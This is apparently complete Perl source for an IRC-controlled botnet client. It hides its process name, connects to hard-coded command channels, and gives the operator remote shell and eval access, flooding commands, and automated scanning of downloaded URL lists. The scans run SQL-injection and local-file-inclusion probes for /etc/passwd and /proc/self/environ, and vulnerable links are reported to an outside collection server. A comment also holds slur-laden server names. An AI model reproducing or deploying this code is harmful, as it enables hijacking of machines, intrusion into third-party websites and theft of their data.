#!/usr/bin/perl use POSIX; use Time::HiRes qw ( setitimer ITIMER_REAL time sleep ); eval { require IO::Socket::INET6; }; if ($@) { use IO::Socket::INET; $whichnet="IO::Socket::INET"; } else { import IO::Socket::INET6; $whichnet="IO::Socket::INET6"; } my @servers = ('irc.byroe.org'); #,'japierole.abuser.eu','zlo.hack-inter.net','jestemzly.abuser.eu','ihujze.bot.nu','hujwto.biz.tm','rocknrolla.h4ck.la','howkurwatoo.linuxsecured.net','fuckinigger.happyforever.com','qwlkejqlkj.melon.org.ru'); my $server='irc.byroe.org'; my $home="#voo"; my @channels=("#spyz"); my $savev="http://www.avefubu.webd.pro/vte/tra/dodaj.php"; my $port="6667"; my $nick=larasuka(7); my $realname=larasuka(7); my $jupe="$nick"; my $oident_spoof="$nick"; my $jupeon="on"; my $ident=larasuka(7); my $botcmd="!e"; #my $botcmd="!".$literaki[int(rand(@literaki))]; my $homekey="itakcitoukradna"; my $usermodes='+igs'; my $oidentd="0"; my $min_lag_show='15'; my $shell_cmd_timeout="60"; my @admin=('spy'); my $aop_admin="0"; my @aop_others=(''); my $outputchan=$home; my $VERSION = "V"; my $max_lines='2'; my $process = "ihujcieto"; my $verbot = ".666"; my $banner = "[evil]:"; my $pid=fork; my $starttime=time(); exit if $pid; $0="$process"."\0"x16; my $botdir="/tmp/"; $lastmsgtime = time(); my $chancount = @channels; my $admincount = @admin; my $aop_otherscount = @aop_others; #local $SIG{__WARN__} = {}; $SIG{'PIPE'} = "IGNORE"; foreach my $sig qw(INT QUIT HUP TERM) { $SIG{$sig} = &handler; } $SIG{__DIE__} = &sigdie_handler; sub debug { print $_[0]."\n" } my($maxsite,$v_threads,$get_timeout) = (20,15,5); $0 = "aVe"; if (-e "$botdir/$nick.pid") { open (PID, "<$botdir/$nick.pid"); my $checkpid = ; close (PID); if(kill(SIGCHLD,$checkpid)!=0) { print "[-] already running ($checkpid) exiting\n"; exit; } } open (PID, ">$botdir/$nick.pid"); print PID "$$"; close (PID); sub larasuka { my @abc = ('a' .. 'z'); for(my $i=0;$i<$_[0];$i++) { $meh .= $abc[int(rand($#abc))]; } return $meh; } sub handler { local($sig) = @_; sendraw("PRIVMSG $home :recieved SIG$sig"); quit("recieved SIG$sig"); close LOG; sleep(2); exit(0); } sub sigdie_handler { open CRASHLOG, ">>/tmp/$nick.crashlog" or warn "Could not open crashlog '$nick.crashlog' for writing: $!"; print CRASHLOG "Died with: $_[0]\n\n", Carp::longmess(), "\n=====\n\n\n"; close CRASHLOG; } ### first time connect START; oident; undef $realnick; my ($sentlines, $alarms, $lag, $publag, $lsent, @lq) = (0, 0, 0, 0, 0, ()); debug "connecting to $server:$port\n"; my $ircsock = $whichnet -> new(PeerAddr => $server, PeerPort => $port, LocalAddr => $host, Proto => 'tcp', Timeout => '10') or reconnect($!); if (defined($ircsock)) { debug "connection established, initiating\n"; $ircsock->autoflush(1); identify(); }; $SIG{ALRM} = sub { sendqueue("de-queue"); $alarms++; if ($shell and time() - $lastmsgtime >= $shell_cmd_timeout) { kill 9, $shell; msg($sendto, "Killed: $shell"); } if ($alarms eq "45" and defined($realnick) and $realnick ne $jupe) { sendqueue("ISON $jupe"); } if ($alarms >= "60") { $alarms=0; if (time() - $lastmsgtime >= "600" and $connd eq 1) { $lastmsgtime = time(); reconnect('TIMEOUT'); } else { if (defined($realnick) && $connd eq 1) { notice($realnick, "LAGSTAT " . time); $lagstat=time(); $sentlines=0; } } } }; setitimer(ITIMER_REAL, 1, 1); sub TS { return "[" . strftime("%H:%M.%S",localtime(time())) . "] "; } sub reconnect { $connd=0; undef @lq; undef $realnick; debug "error: $_[0] ..\n"; if (defined($ircsock)) { close $ircsock; undef $ircsock; }; sleep "1" for 1..10; my $server=(); my $server=$servers[int(rand($#servers))]; debug "Reconnecting...\n"; debug "Connecting to $server:$port\n"; oident; $ircsock = $whichnet -> new(PeerAddr => $server, PeerPort => $port, LocalAddr => $host, Proto => 'tcp', Timeout => '10') or reconnect($!); if (defined($ircsock)) { $ircsock->autoflush(1); identify(); }; } while($line = <$ircsock>){ $lastmsgtime = time(); $line =~ s/\r\n$//; $connd=1; debug "[RECV]: $line\n"; if ($line =~ /^\:(.+?)\!(.+?)\@(.+?) NOTICE (.+?) \:(.+)/) { my $from=$1; my $hostmaircsock=$3; my $to=$4; my $args=$5; my $mask="$2\@$hostmaircsock"; if ($to eq $realnick and $from eq $realnick and $args =~ /^LAGSTAT (.+)/) { $lag = time() - $lagstat; $lag = substr($lag, 0, 4); if ($lag > $min_lag_show or $publag eq 1) { msg($outputchan, "[Lag]: $lag Second(s)"); $lagstat=time(); $outputchan=$home; $publag=0; } } } if ($line =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { my $from=$1; my $hostmaircsock=$3; my $to=$4; my $args=$5; my $mask="$hostmaircsock\E"; $fishmsg=0; if (defined($usefish) && $args =~ /^\Q$prefix\E(.+)/i) { $fishmsg=1; my $blowfish = new Crypt::ircBlowfish; $blowfish->set_key($fishkey); $args=$blowfish->decrypt($1); } if ($args =~ /\001PING.*\001$/) { msg("$home", "[Ping] from: $from");} if ($args =~ /\001USERINFO.*\001$/) { msg("$home", "[Userinfo] from: $from");} if ($args =~ /\001TIME.*\001$/) { msg("$home", "[Time] from: $from");} if ($args =~ /^\001VERSION\001$/) { notice("$from", "\001VERSION $VERSION\001"); { msg("$home", "[Version] from: $from");} } #if (grep {$_ =~ /^\Q$mask\E$/i } @admin ) { if ($args =~ /^(\Q$realnick\E|\Q$botcmd\E)\s+(.*)/i ) { my $arg = $2; if ($arg =~ /^\!(.*)/) { cmdcase("$from","$to","$arg"); } } #} } if ($line !~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { if ($line=~ /^ERROR \:(.*)/) { reconnect($1); } if ($line=~ /^PING \:(.*)/) { sendraw("PONG :$1"); if (not $connd) { $connd=1; identify(); } } if ($line=~ /^\:(.+?)\s+451 (.+) \:You have not registered/) { identify(); } if ($line =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { if (lc($1) eq lc($realnick)) { sendraw("MONITOR - $1"); } if (lc($1) eq lc($jupe) and lc($1) eq lc($realnick) and $jupe eq "on") { nick("$jupe"); } if (lc($1) eq lc($realnick)) { $realnick=$4; } } if ($line =~ /^\:(.+?)\!(.+?)\@(.+?)\s+JOIN\s+\:(\S+)/) { $mask="$3"; if (grep {$_ =~ /^\Q$mask\E$/i } @admin and $aop_admin eq "1") { op("$4", "$1"); } else { if ($1 ne $realnick and @aop_others ne '' && grep {$_ =~ /^\Q$mask\E$/i } @aop_others) { op("$4", "$1"); } } } if ($line =~ /^\:(.+?)\!(.+?)\@(.+?)\s+INVITE\s+(.+?)\:(\S+)/) { $mask="$3"; if (grep {$_ =~ /^\Q$mask\E$/i } @admin ) {j("$5");} } if ($line =~ /^\:(.+?)\s+718 (.+?) (.+?) (.+?)\@(.+?) (.*)/) { $mask="$5"; if (grep {$_ =~ /$mask\E$/i } @admin ) { sendraw("ACCEPT $3"); notice($3, "Accepted."); } } else { if ($line =~ /^\:(.+?)\s+718 (.+?) (.+?) (.+?)\@(.+?) (.*)/) { msg("$home", "[Msg] From $3"); } } } if ($line =~ /^\:(.+?)\s+433 (.+) (.+) \:/ and !defined($realnick)) { $randc=@{[ 'a' .. 'z' , 'A' .. 'Z' ]}[int(rand(26 * 2))]; if (length("$3_") > 9) { nick(substr($3, 0, 8).$randc); } else { nick($3.$randc); } } if ($line =~ /^\:(.+?)\s+47(.{1}) (.+) (.+) \:(.+)/) { msg("$home", "$4 $5"); } if ($line =~ /^\:(.+?)\s+730 (.*) \:(.*)!/) { if ($realnick ne $3) {msg("$home", "Jupe: $3");} } if ($line =~ /^\:(.+?)\s+731 (.+) \:(.+)/) { if ($jupeon eq "on") {nick("$3");} } if ($line =~ /^\:(.+?)\s+732 (.*) \:(.*)/) { msg("$outputchan", "Monitoring: $3."); $outputchan=$home; } if ($line =~ m/^\:(.+?)\s+001\s+(\S+)\s/) { $realnick = $2; $connd=1; sendraw("MODE $realnick $usermodes"); j("$home $homekey"); msg("$home", "Hello Voo_Doo"); foreach my $chans (@channels) { j("$chans") if $chans ne ""; } if ($realnick ne $jupe) {sendraw("MONITOR + $jupe");} } if ($line =~ /^\:(.+?)\!(.+?)\@(.+?) KICK (.+?) (.+?) \:(.*)/) { my $from=$1; my $hostmaircsock=$3; my $where=$4; my $who=$5; if ($who eq $realnick) {j("$where");} } if ($line =~ /^\:(.+?)\!(.+?)\@(.+?) QUIT \:(.*)/) { if (lc($1) eq lc($jupe) and $jupeon eq "on") {nick("$jupe");} } if ($line =~ m/^\:(.+?)\s+332 (.+?) (.+?) \:(.+)/i and lc($3) eq lc($home)) { } if ($line =~ m/^\:(.+?)\s+303 (.*) \:(.*)/i) { if (!$3) { nick("$jupe"); } } } sub cmdcase { ($from, $to, $args) = @_; if ($to eq $realnick){ $sendto=$from; } else { $sendto=$to; } if ($args=~ /^!nick (.+)/i){ sendraw("MONITOR - $realnick"); nick("$1"); } if ($args=~ /^!cq$/i){ $qc = @lq; undef @lq; msg("$sendto", "cleared \002$qc\002 items from queue"); } if ($args=~ /^!die$|^!die (.*)/i){ quit("$1"); sleep 1; exit; } if ($args=~ /^!quit$|^!quit (.*)/i){ quit("$1"); sleep 1; exit; } if ($args=~ /^!raw (.+)/i){ sendqueue("$1"); } if ($args=~ /^!lag$/i){ msg("$sendto", "Lag: $lag"); } if ($args=~ /^!reallag$/i){ $outputchan=$sendto; $publag=1; notice($realnick, "LAGSTAT " . time); $lagstat=time(); } if ($args=~ /^!join (.+)/i){ j("$1 $2"); } if ($args=~ /^!part (.+)/i){ p("$1 $2"); return; } if ($args=~ /^!part$/i) { p("$sendto"); return; } if ($args=~ /^!hop$/i){ p("$sendto"); j("$sendto"); } if ($args=~ /^!cycle (.+)/i){ p("$1 $2"); j("$1 $2"); return; } if ($args=~ /^!cycle$/i){ p("$sendto"); j("$sendto"); return; } if ($args=~ /^!eval (.+)/i) { eval "$1"; if ($@) { foreach my $err (split(/\n/,$@)) { msg("$sendto", $err) } } } if ($args=~ /^!reval (.+)/i) { my $vars=eval $1; foreach my $var (split(/\n/,$vars)) { msg("$sendto", $var); } } if ($args=~ /^!jupe (.+)/i){ $jupe=$1; $jupeon="on"; $jupe=~ s/ /\,/g; sendraw("MONITOR - $realnick"); sendraw("MONITOR + $jupe"); $jupe=~ s/\,/ /g; } if ($args=~ /^!jupelist$/i){ $outputchan=$sendto; sendraw("monitor l"); } if ($args=~ /^!jupeoff$/i){ msg("$sendto", "[Jupe]: Halted"); if ($jupeon eq "on") { sendraw("monitor c"); $jupeon="off"; $jupe=$realnick; } } if ($args=~ /^!status$/i){ msg("$sendto", "Jupe: $jupeon"); $outputchan=$sendto; sendraw("monitor l"); } if ($args=~ /^!op\s+(\S+) (.+)/i){ op("$sendto", "$2"); return; } if ($args=~ /^!op$/i) { op("$sendto", "$from"); return; } if ($args=~ /^!deop\s+(\S+) (.+)/i){ deop("$1", "$2"); } #---------------------------------------------------------------------- if ($args=~ /^!podajsql (.+)/i){srand(); if(my $xid = fork){ waitpid($xid,0); } else{ if(fork){ exit; } else{ my $save = "/tmp/".int(rand(1)*100); `wget $1 -O $save`; my $czaj = $save; open(FILE, $czaj); print("open $czaj \r\n"); while() { my $jo=$_; chomp $jo; $jo=~s/\n//; $jo=~s/\r//; if($jo=~ /(.*?[=])/g){ &sqlbrute($1); } } close(FILE); `rm -rf $czaj`; } exit; } } if ($args=~ /^!podajlfi (.+)/i){ if(my $xid = fork){ waitpid($xid,0); } else{ if(fork){ exit; } else{ my $save = "/tmp/".int(rand(1)*100); `wget $1 -O $save`; my $czaj = $save; open(FILE, $czaj); print("open $czaj \r\n"); while() { my $jo=$_; chomp $jo; $jo=~s/\n//; $jo=~s/\r//; if($jo=~ /(.*?[=].\/)/g){ &podajlfi($1); } } close(FILE); `rm -rf $czaj`; sendraw("PRIVMSG #voo End Lfi"); } exit; } } if ($args=~ /^!msg\s+(\S+) (.+)/i){ msg("$1", "$2"); } if ($args=~ /^!say\s+(.+)/i){ msg("$sendto", "$1"); } if ($args=~ /^!uptime$/i){ msg("$sendto", &uptime); } if ($args=~ /^!killshell$/i){ close(SHELL) || msg("$sendto", "child exited $?"); } if ($args=~ /^!shell (.+)/i){ shell("$sendto", "$1"); } if ($args=~ /^!notice\s+(\S+) (.+)/i){ notice("$1", "$2"); } if ($args=~ /^!flood\s+(\d+)\s+(\S+) (.*)/i) { for (my $cf = 1; $cf <= $1; $cf++) { msg("$2", "$3"); } } if ($args=~ /^!ctcp\s+(\S+) (.*)/i) { ctcp("$1", "$2"); } if ($args=~ /^!ctcpflood\s+(\d+)\s+(\S+) (.*)/i) { for (my $cf = 1; $cf <= $1; $cf++) { ctcp("$2", "$3"); } } if ($args=~ /^!reconnect$/i){ reconnect("requested by $from"); } if ($args=~ /^!restart$/i){ system("rm $nick.pid; perl $nick"); handler("restart"); } ###################################################################################### ###################################################################################### } sub inspect { my $where=$_[0]; my $what=$_[1]; use B::Deparse; my $sub = (B::Deparse->new)->coderef2text(\&{$what}); $sub =~ s/$_->[0]/$_->[1]/g foreach (["\x09", " "]); foreach my $line (split /\n/, $sub) { msg($where, $what .": $line"); } } sub ctcp { return unless $#_ == 1; sendqueue("PRIVMSG $_[0] :\001$_[1]\001"); } sub notice { return unless $#_ == 1; sendqueue("NOTICE $_[0] :$_[1]"); } sub op { return unless $#_ == 1; sendqueue("MODE $_[0] +o $_[1]"); } sub deop { return unless $#_ == 1; sendqueue("MODE $_[0] -o $_[1]"); } sub j { &join(@_); } sub join { return unless $#_ == 0; sendqueue("JOIN $_[0]"); } sub p { part(@_); } sub part { sendqueue("PART $_[0]"); } sub nick { return unless $#_ == 0; sendraw("NICK $_[0]"); } sub quit { undef @lq; sendraw("QUIT :$_[0]"); } sub identify { sendraw("USER $ident 0 $server :$realname"); sendraw("NICK $nick"); } sub uptime { my $curtime=time(); $secs=int($curtime - $starttime); @parts = gmtime($secs); $uptime=sprintf("%s days, %s hours, %s minutes, %s seconds.",@parts[7,2,1,0]); return "[Bot Uptime]: $uptime" } sub sendraw { if (!defined($ircsock)) { return; } my $text = shift; chomp($text); $sentlines++; $text = $text . "\r\n"; debug "SEND: $text"; print $ircsock $text or reconnect('couldnt sendraw'); } sub sqlbrute() { my $To=$home; my $site=$_[0]; my $columns="20"; my $cfin.="--"; my $cmn.= "+"; for($column=0;$column<$columns;$column++) { $union.=','.$column; $inyection.=','."0x4655434b5f465245455f574f524c44"; if ($column == 0) { $inyection = ''; $union = ''; } $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x4655434b5f465245455f574f524c44".$inyection.$cfin; $response=&getreq($sql); if($response =~ /FUCK_FREE_WORLD/) { $column ++; $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin; sendraw("PRIVMSG #voo $sql"); &dodaj("sqlczyste",$sql); #print $sqlv "$sql \n"; #&dodaj('sqltable', $sql); }}} sub podajlfi() { my $To=$home; my $site=$_[0]; my $lfi = $site."./../../../../../../../../../../../etc/passwd"; $co=&get_content($lfi); if($co =~ /root:x:/) { sendraw("PRIVMSG #voo $lfi"); &dodaj("lfi",$lfi); } my $lfi2 = $site."./../../../../../../../../../../../etc/passwd%00"; $co2=&get_content($lfi2); if($co2 =~ /root:x:/) { sendraw("PRIVMSG #voo $lfi2"); &dodaj("lfi",$lfi2); } my $lfie = $site."./../../../../../../../../../../../proc/self/environ%00"; $coe=&get_content($lfie); if($coe =~ /HTTP_ACCEPT/) { sendraw("PRIVMSG #voo $lfie"); &dodaj("lfienv",$lfie); } my $lfi2e = $site."./../../../../../../../../../../../proc/self/environ"; $co2e=&get_content($lfi2e); if($co2e =~ /HTTP_ACCEPT/) { sendraw("PRIVMSG #voo $lfi2e"); &dodaj("lfienv",$lfie2); } } sub msg { return unless $#_ == 1; if (defined($usefish) && $fishmsg eq 1) { my $blowfish = new Crypt::ircBlowfish; my $encrypted_message = ''; my $cleartext = ''; $blowfish->set_key($fishkey); $encrypted_message = $prefix . $blowfish->encrypt($_[1]); sendqueue("PRIVMSG $_[0] :$encrypted_message"); } else { sendqueue("PRIVMSG $_[0] :$_[1]"); } } use MIME::Base64; sub dodaj() { my $co = $_[0]; my $link = $_[1]; my $linkraz = $_[2]; my $links = encode_base64($link); my $lindwa = encode_base64($linkraz); $links=~s/\n//; $links=~s/\r//;$lindwa=~s/\n//; $lindwa=~s/\r//; if($co eq "sqlczyste") { my $safet = $savev.'?co=sql_v&link='.$links; &getreq($safet); } if($co eq "lfi") { my $safet = $savev.'?co=lfi_v&link='.$links; &getreq($safet); } if($co eq "lfienv") { my $safet = $savev.'?co=lfienv_v&link='.$links; &getreq($safet); } #--------------------------------------------------------- _LFI } sub urlencode($){ my $unclean = shift; $unclean =~ s/\?/\%3f/gi; $unclean =~ s/ /\+/gi; $unclean =~ s/:/\%3A/gi; $unclean =~ s/\//\%2F/gi; $unclean =~ s/&/\%26/gi; $unclean =~ s/\"/\%22/gi; $unclean =~ s/\'/\%27/gi; $unclean =~ s/,/\%2C/gi; $unclean =~ s/\\/\%5C/gi; return $unclean; } sub urldecode($){ my $clean = shift; $clean =~ s/\%3f/\?/gi; $clean =~ s/\+/ /gi; $clean =~ s/\%3A/:/gi; $clean =~ s/\%2F/\//gi; $clean =~ s/\%26/&/gi; $clean =~ s/\%22/\"/gi; $clean =~ s/\%27/\'/gi; $clean =~ s/\%2C/,/gi; $clean =~ s/\%5C/\\/gi; return $clean; } sub getreq($){ my($url,$query,$xcon,$host,$get,@content,@ags) = ($_[0]); @ags = ("Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.6) Gecko/20050223 Firefox/1.0.1","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20061201 Firefox/2.0.0.4 (Ubuntu-feisty)","Microsoft Pocket Internet Explorer/0.6","Microsoft Internet Explorer/4.0b1 (Windows 95)"); $url =~ m/http:\/\/(.*?)\/(.*)/; ($host,$url,$query) = ($1,"$1/$2","/$2"); eval{ local $SIG{ALRM} = sub{print("[-] Timed out - $url\n");die;}; alarm $get_timeout; $get = IO::Socket::INET->new(PeerAddr=>"$host:80",Proto=>"tcp") or sub{die("FAILED\n");}; print $get "GET $query HTTP/1.0\r\nHost: $host\r\nUser-Agent: " . $ags[int(rand(0)*$#ags)] . "\r\nAccept: */*\r\nConnection: close\r\n\r\n"; @content = <$get>; $xcon = "@content"; close($get); alarm 0; }; return urldecode($xcon); } #---------------------------- sub shell { my $where=$_[0]; my $command=$_[1]; if ($command =~ /cd (.*)/) { chdir("$1") || msg("$where", "no such file or directory"); return; } debug "executing $command\n"; $shell = open(SHELL, "-|"); if ($shell) { # parent #waitpid($shell, 0); while (my $lines = ) { $lines = " " if !length($lines) or $lines eq "\n"; msg("$where", "[shell]: $lines"); } close(SHELL); } else { # child ($EUID, $EGID) = ($UID, $GID); # suid only exec("$command") || print "can't exec $command: $!"; exit; } undef $shell; } sub sendqueue { if ($_[0] eq 'de-queue') { goto dq }; if (!defined($ircsock)) { return; } my $text = shift; chomp($text); $qlength = push @lq, $text; defer: return 0; dq: $lsent = 0; $qlength = @lq; if ($qlength > 0) { debug "de-queueing, $max_lines lines max, $qlength lines in queue.\r\n"; } foreach my $n (1..($max_lines - $lsent)) { last unless scalar(@lq); $sentlines++; if ($sentlines > "35") { debug "WARNING: sent $sentlines lines within one minute (slowing down)\r\n"; sleep(0.37); } $text = shift(@lq) . "\r\n"; debug "SEND: $text"; print $ircsock $text or reconnect('couldnt sendqueue'); $lsent++; } return 1; } goto START